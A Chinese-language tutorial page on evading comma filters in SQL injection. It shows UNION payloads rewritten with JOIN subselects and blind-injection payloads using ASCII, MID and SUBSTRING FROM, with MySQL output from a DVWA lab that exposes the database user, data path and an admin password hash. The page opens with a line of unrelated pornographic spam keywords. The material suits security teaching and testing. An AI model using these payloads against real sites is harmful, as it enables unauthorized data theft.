欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

SQL注入技巧之顯注與盲注中過(guò)濾逗號(hào)繞過(guò)詳析

 更新時(shí)間:2018年08月19日 11:07:06   作者:曉楓v5  
SQL注入的繞過(guò)技巧有很多,下面這篇文章主要給大家介紹了關(guān)于SQL注入技巧之顯注與盲注中過(guò)濾逗號(hào)繞過(guò)的相關(guān)資料,文中通過(guò)示例代碼介紹的非常詳細(xì),需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧

前言

sql注入在很早很早以前是很常見(jiàn)的一個(gè)漏洞。后來(lái)隨著安全水平的提高,sql注入已經(jīng)很少能夠看到了。但是就在今天,還有很多網(wǎng)站帶著sql注入漏洞在運(yùn)行。下面這篇文章主要介紹了關(guān)于SQL注入逗號(hào)繞過(guò)的相關(guān)內(nèi)容,分享出來(lái)供大家參考學(xué)習(xí),下面話不多說(shuō)了,來(lái)一起看看詳細(xì)的介紹吧

1.聯(lián)合查詢顯注繞過(guò)逗號(hào)

在聯(lián)合查詢時(shí)使用 UNION SELECT 1,2,3,4,5,6,7..n 這樣的格式爆顯示位,語(yǔ)句中包含了多個(gè)逗號(hào),如果有WAF攔截了逗號(hào)時(shí),我們的聯(lián)合查詢不能用了。

繞過(guò)

在顯示位上替換為常見(jiàn)的注入變量或其它語(yǔ)句

union select 1,2,3;

union select * from ((select 1)A join (select 2)B join (select 3)C);

union select * from ((select 1)A join (select 2)B join (select group_concat(user(),' ',database(),' ',@@datadir))C);

在數(shù)據(jù)庫(kù)中演示聯(lián)合查詢

UNION開始是我們?cè)赨RL中注入的語(yǔ)句,這里只是演示,在實(shí)際中如果我們?cè)谧⑷胝Z(yǔ)句中有逗號(hào)就可能被攔截

mysql> select user_id,user,password from users union select 1,2,3;
+---------+-------+----------------------------------+
| user_id | user | password  |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 1 | 2 | 3  |
+---------+-------+----------------------------------+
2 rows in set (0.04 sec)

不出現(xiàn)逗號(hào),使用Join來(lái)注入

mysql> select user_id,user,password from users union select * from ((select 1)A join (select 2)B join (select 3)C);
+---------+-------+----------------------------------+
| user_id | user | password  |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 1 | 2 | 3  |
+---------+-------+----------------------------------+
2 rows in set (0.05 sec)

查詢我們想要的數(shù)據(jù)

mysql> select user_id,user,password from users union select * from ((select 1)A join (select 2)B join (select group_concat(user(),' ',database(),' ',@@datadir))C);;
+---------+-------+-------------------------------------------------+
| user_id | user | password   |
+---------+-------+-------------------------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 1 | 2 | root@192.168.228.1 dvwa c:\phpStudy\MySQL\data\ |
+---------+-------+-------------------------------------------------+
2 rows in set (0.08 sec)

2.盲注中逗號(hào)繞過(guò)

MID 和substr 函數(shù)用于從文本字段中提取字符

mysql> select mid(user(),1,2);
+-----------------+
| mid(user(),1,2) |
+-----------------+
| ro |
+-----------------+
1 row in set (0.04 sec)

查詢數(shù)據(jù)庫(kù)用戶名第一個(gè)字符的ascii碼

mysql> select user_id,user,password from users union select ascii(mid(user(),1,2)),2,3;
+---------+-------+----------------------------------+
| user_id | user | password  |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 114 | 2 | 3  |
+---------+-------+----------------------------------+
2 rows in set (0.05 sec)

盲注,通過(guò)猜ascii值

mysql> select user_id,user,password from users where user_id=1 and (select ascii(mid(user(),1,2))=115) ;
Empty set

mysql> select user_id,user,password from users where user_id=1 and (select ascii(mid(user(),1,2))=114) ;
+---------+-------+----------------------------------+
| user_id | user | password  |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+-------+----------------------------------+
1 row in set (0.04 sec)

逗號(hào)繞過(guò)SUBTTRING 函數(shù)

substring(str FROM pos)

從字符串str的起始位置pos 返回一個(gè)子串

mysql> select substring('hello' from 1);
+---------------------------+
| substring('hello' from 1) |
+---------------------------+
| hello  |
+---------------------------+
1 row in set (0.04 sec)

mysql> select substring('hello' from 2);
+---------------------------+
| substring('hello' from 2) |
+---------------------------+
| ello  |
+---------------------------+
1 row in set (0.03 sec)

注入

mysql> select user_id,user,password from users where user_id=1 and (ascii(substring(user() from 2))=114) ;
Empty set
//substring(user() from 2)為o
//o的ascii為111,
mysql> select user_id,user,password from users where user_id=1 and (ascii(substring(user() from 2))=111) ;
+---------+-------+----------------------------------+
| user_id | user | password  |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+-------+----------------------------------+
1 row in set (0.03 sec)

總結(jié)

以上就是這篇文章的全部?jī)?nèi)容了,希望本文的內(nèi)容對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,如果有疑問(wèn)大家可以留言交流,謝謝大家對(duì)腳本之家的支持。

相關(guān)文章

  • 一篇文章帶你了解數(shù)據(jù)庫(kù)中JOIN的用法

    一篇文章帶你了解數(shù)據(jù)庫(kù)中JOIN的用法

    這篇文章主要給大家介紹了關(guān)于數(shù)據(jù)庫(kù)中JOIN的用法,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家學(xué)習(xí)或者使用數(shù)據(jù)庫(kù)具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
    2019-04-04
  • 問(wèn)哭自己lsm?索引原理深入剖析

    問(wèn)哭自己lsm?索引原理深入剖析

    這篇文章主要為大家介紹了問(wèn)哭自己lsm?索引原理及剖析,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪
    2023-04-04
  • 開源數(shù)據(jù)庫(kù)設(shè)計(jì)神器chiner的安裝及初體驗(yàn)介紹

    開源數(shù)據(jù)庫(kù)設(shè)計(jì)神器chiner的安裝及初體驗(yàn)介紹

    最近在造輪子,從?0?到?1?的那種,就差前臺(tái)的界面了,大家可以耐心耐心耐心期待一下。其中需要設(shè)計(jì)一些數(shù)據(jù)庫(kù)表,可以通過(guò)?Navicat?這種圖形化管理工具直接開搞,也可以通過(guò)一些數(shù)據(jù)庫(kù)設(shè)計(jì)工具來(lái)搞,比如說(shuō)?PowerDesigner,更專業(yè)一點(diǎn)
    2022-02-02
  • navicat導(dǎo)入CSV文件詳細(xì)操作步驟

    navicat導(dǎo)入CSV文件詳細(xì)操作步驟

    通過(guò)Navicat我們可以很方便的完成備份和還原操作,下面這篇文章主要給大家介紹了關(guān)于navicat導(dǎo)入CSV文件的詳細(xì)操作步驟,需要的朋友可以參考下
    2023-12-12
  • 一款免費(fèi)開源的通用數(shù)據(jù)庫(kù)工具DBeaver

    一款免費(fèi)開源的通用數(shù)據(jù)庫(kù)工具DBeaver

    這篇文章主要介紹了一款免費(fèi)開源的通用數(shù)據(jù)庫(kù)工具DBeaver,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
    2020-10-10
  • DeepinV20快速安裝Mariadb的詳細(xì)步驟

    DeepinV20快速安裝Mariadb的詳細(xì)步驟

    本文給大家介紹DeepinV20安裝Mariadb的詳細(xì)步驟,MariaDB數(shù)據(jù)庫(kù)管理系統(tǒng)是MySQL的一個(gè)分支,添加一些功能支持本地的非阻塞操作和進(jìn)度報(bào)告,具體內(nèi)容詳情跟隨小編一起看看吧
    2021-07-07
  • 復(fù)雜系統(tǒng)中的用戶權(quán)限數(shù)據(jù)庫(kù)設(shè)計(jì)解決方案

    復(fù)雜系統(tǒng)中的用戶權(quán)限數(shù)據(jù)庫(kù)設(shè)計(jì)解決方案

    這篇文章主要介紹了復(fù)雜系統(tǒng)中的用戶權(quán)限數(shù)據(jù)庫(kù)設(shè)計(jì)解決方案,針對(duì)大型、復(fù)雜的B/S系統(tǒng),需要的朋友可以參考下
    2014-06-06
  • 當(dāng)數(shù)據(jù)庫(kù)變慢時(shí)的解決方法

    當(dāng)數(shù)據(jù)庫(kù)變慢時(shí)的解決方法

    當(dāng)數(shù)據(jù)庫(kù)變慢時(shí),我們應(yīng)如何入手,下面的解決方法。
    2009-04-04
  • SQL注入的2個(gè)小Trick及示例總結(jié)

    SQL注入的2個(gè)小Trick及示例總結(jié)

    這篇文章主要給大家介紹了關(guān)于SQL注入的2個(gè)小Trick的相關(guān)資料,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
    2018-11-11
  • SQL server 2005的表分區(qū)

    SQL server 2005的表分區(qū)

    SQL server 2005的表分區(qū)...
    2006-12-12

最新評(píng)論